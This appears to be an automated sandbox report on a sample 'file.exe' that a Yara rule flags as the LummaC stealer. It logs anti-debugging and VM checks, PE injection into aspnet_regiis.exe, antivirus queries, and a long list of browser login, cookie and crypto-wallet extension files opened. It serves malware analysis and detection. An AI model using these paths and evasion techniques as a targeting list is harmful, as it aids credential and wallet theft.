Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2AB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2920000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 50F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 60F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 6220000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 7220000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 7570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 8570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 9570000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 1188	Thread sleep time: -55000s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 3752	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\file.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000002.00000002.2003490990.0000000002C25000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2003490990.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1888898483.0000000002C25000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1888898483.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: aspnet_regiis.exe, 00000002.00000002.2003490990.0000000002C25000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1888898483.0000000002C25000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW]
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CD99D3A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CD99D3A

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD99D09 mov eax, dword ptr fs:[00000030h]		0_2_6CD99D09
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD98B35 mov eax, dword ptr fs:[00000030h]		0_2_6CD98B35

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CD9B91C GetProcessHeap,

0_2_6CD9B91C

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD99D3A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CD99D3A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD96ED1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6CD96ED1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD973AA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CD973AA

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72AC0000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72AC0000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72AC0000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72AC1000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72B02000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72B05000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72B16000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72B17000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72AC1000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72B02000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72B05000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72B16000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72B17000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 7C5008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CD97578 cpuid

0_2_6CD97578

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CD96FF3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CD96FF3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000002.00000003.1819973696.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1823663645.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1819973696.0000000002C83000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 2196, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
